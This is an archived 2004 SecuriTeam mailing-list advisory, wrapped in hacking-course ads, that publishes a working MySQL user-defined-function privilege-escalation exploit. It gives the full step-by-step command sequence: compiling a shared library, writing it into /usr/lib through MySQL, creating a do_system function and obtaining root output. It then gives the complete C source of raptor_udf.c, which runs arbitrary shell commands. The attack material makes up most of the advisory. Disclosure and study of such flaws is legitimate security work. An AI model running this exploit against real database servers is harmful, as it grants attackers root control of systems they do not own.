Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] MySQL UDF Dynamic Library Exploit

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] MySQL UDF Dynamic Library Exploit
Date: 27 Dec 2004 10:23:54 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  MySQL UDF Dynamic Library Exploit
------------------------------------------------------------------------


SUMMARY

MySQL provides a mechanism by which the default set of functions can be 
expanded by means of custom written dynamic libraries containing User 
Defined Functions, or UDFs. If MySQL is installed with root privileges, 
the UDF mechanism allows an attacker to install and run malicious code as 
root.

DETAILS

As can be seen from the example usage below, the attack is done by linking 
the provided code as a dynamic library. If MySQL is installed to run with 
root privileges, the attacker can then create a UDF which points to 
his/her malicious code and run it with root privileges.
For more information on MySQL Security visit  
<http://www.ngssoftware.com/papers/HackproofingMySQL.pdf> Hackproofing 
MySQL

Usage:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
$ gcc -g -c raptor_udf.c
$ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o 
-lc
$ mysql -u root -p
Enter password:
[...]
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
mysql> create function do_system returns integer soname 'raptor_udf.so';
mysql> select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

Exploit Code:
raptor_udf.c
/*
 * $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
 *
 * raptor_udf.c - dynamic library for do_system() MySQL UDF
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This is an helper dynamic library for local privilege escalation 
through
 * MySQL run with root privileges (very bad idea!). Tested on MySQL 
4.0.17.
 *
 * Code ripped from: 
http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
 *
 * "MySQL provides a mechanism by which the default set of functions can 
be
 * expanded by means of custom written dynamic libraries containing User
 * Defined Functions, or UDFs". -- Hackproofing MySQL
 *
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf.c
 * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so 
raptor_udf.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
 * mysql> create function do_system returns integer soname 
'raptor_udf.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+---------------+----------+
 * | name      | ret | dl            | type     |
 * +-----------+-----+---------------+----------+
 * | do_system |   2 | raptor_udf.so | function |
 * +-----------+-----+---------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 */

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
 unsigned int  arg_count; // number of arguments
 enum Item_result *arg_type; // pointer to item_result
 char    **args;  // pointer to arguments
 unsigned long  *lengths; // length of string args
 char   *maybe_null; // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
 char   maybe_null; // 1 if func can return NULL
 unsigned int  decimals; // for real functions
 unsigned long   max_length; // for string functions
 char   *ptr;  // free ptr for func data
 char   const_item; // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char 
*error)
{
 if (args->arg_count != 1)
  return(0);

 system(args->args[0]);

 return(0);
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:raptor@0xdeadbeef.info> 
Raptor.
The original article can be found at:  
<http://www.0xdeadbeef.info/exploits/raptor_udf.c> 
http://www.0xdeadbeef.info/exploits/raptor_udf.c



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] MySQL UDF Dynamic Library Exploit, SecuriTeam <=
Previous by Date:  [EXPL] Local Privilege Escalation in Solaris Passwd, SecuriTeam
Next by Date:  [EXPL] Mercury/32 Exploit Code (14 Targets), SecuriTeam
Previous by Thread:  [EXPL] Local Privilege Escalation in Solaris Passwd, SecuriTeam
Next by Thread:  [EXPL] Mercury/32 Exploit Code (14 Targets), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]